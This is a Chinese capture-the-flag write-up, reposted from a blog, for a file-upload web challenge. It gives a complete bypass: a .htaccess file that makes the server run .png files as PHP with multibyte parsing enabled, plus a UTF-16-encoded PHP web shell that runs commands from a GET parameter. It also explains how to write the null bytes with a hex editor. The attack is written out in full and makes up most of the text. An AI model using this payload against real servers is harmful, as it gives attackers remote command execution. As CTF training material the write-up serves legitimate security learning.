polar CTF上传
2023-12-29 15:29:44
WEB-上传
一、查看题目信息
二、漏洞分析
经过上传测试发现,这题过滤掉了<?,这样正常的一句话木马就没法上传,这里可以用utf-16编码绕过。因为utf-16占utf-8的两倍长度,上传时默认检测为utf-8,从而就能绕过检测成功上传。
同时这题可以上传.htaccess,利用.htaccess文件去解析传上去的木马。
三、解题步骤
将配置文件与WebShell一起上传到同一文件夹。
.htaccess:
#define width 1337
#define height 1337
AddType application/x-httpd-php .png
php_value zend.multibyte 1
php_value zend.detect_unicode 1
php_value display_errors 1
三、关于UTF-16的WebShell的制作
制作UTF-16的WebShell可以用编码器改变编码之后用WinHex写入到文件里,不要用文本编辑器,因为它可能会将空字节(0x00)转成空格(0x20)
1.png:
< ? p h p s y s t e m ( $ _ G E T [ ' c m d ' ] ) ; d i e ( ) ; ? >
文章来源:https://blog.csdn.net/qq_36286161/article/details/135291396
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!